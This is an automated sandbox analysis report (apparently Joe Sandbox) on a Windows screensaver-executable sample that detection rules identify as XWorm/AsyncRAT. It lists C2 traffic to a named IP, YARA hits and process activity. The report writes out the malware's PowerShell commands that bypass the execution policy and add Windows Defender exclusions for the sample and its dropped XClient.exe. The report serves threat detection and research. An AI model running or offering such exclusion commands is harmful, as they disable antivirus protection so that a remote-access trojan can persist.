              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: cxFT.pdb source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr
              Source: Binary string: cxFT.pdbSHA256 source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.250.180.178:7061 -> 192.168.2.6:49770
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.250.180.178:7061 -> 192.168.2.6:49770
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49770 -> 104.250.180.178:7061
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49770 -> 104.250.180.178:7061
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49770 -> 104.250.180.178:7061
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 104.250.180.178
              Yara detected Generic Downloader
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.6:49770 -> 104.250.180.178:7061
              Source: Joe Sandbox ViewIP Address: 104.250.180.178 104.250.180.178
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: powershell.exe, 0000000A.00000002.2322743130.000000000725D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miSt
              Source: powershell.exe, 00000007.00000002.2268207610.0000000006C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000004.00000002.2232645049.0000000008764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microR
              Source: powershell.exe, 00000007.00000002.2251654421.0000000002944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
              Source: powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000005496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.00000000056C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 0_2_02E7D3A40_2_02E7D3A4
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_0310622D3_2_0310622D
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_031044D03_2_031044D0
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_03104AC83_2_03104AC8
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_031014583_2_03101458
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058BC4583_2_058BC458
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B31383_2_058B3138
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B80E03_2_058B80E0
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B28683_2_058B2868
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B73903_2_058B7390
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B7AF33_2_058B7AF3
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B25203_2_058B2520
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B48523_2_058B4852
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_066994973_2_06699497
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_0669E2783_2_0669E278
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_066959CC3_2_066959CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BDB4984_2_04BDB498
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BDB4884_2_04BDB488
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08BD3AA84_2_08BD3AA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BB4A07_2_041BB4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BB49B7_2_041BB49B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08193A987_2_08193A98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0471B49010_2_0471B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0471B47010_2_0471B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04B0B49014_2_04B0B490
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157704165.0000000004079000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2158645317.00000000058C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2156582021.00000000013FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157704165.00000000040B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157295618.00000000030FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000000.2099272055.0000000000C12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2159150876.0000000007410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4559034426.00000000013C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4584959229.0000000004301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4588365166.0000000006539000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: XClient.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, evBSdWeBEycC8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, evBSdWeBEycC8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, gtv0gssvKWWRAOg38T65o.csBase64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, gtv0gssvKWWRAOg38T65o.csBase64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@15/21@0/1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\THITWNSEI24112908089786756456545346568789-00010.scr.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2444:120:WilError_03
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMutant created: \Sessions\1\BaseNamedObjects\XczLagvCjDnYaiUQ
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile read: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"Jump to behavior
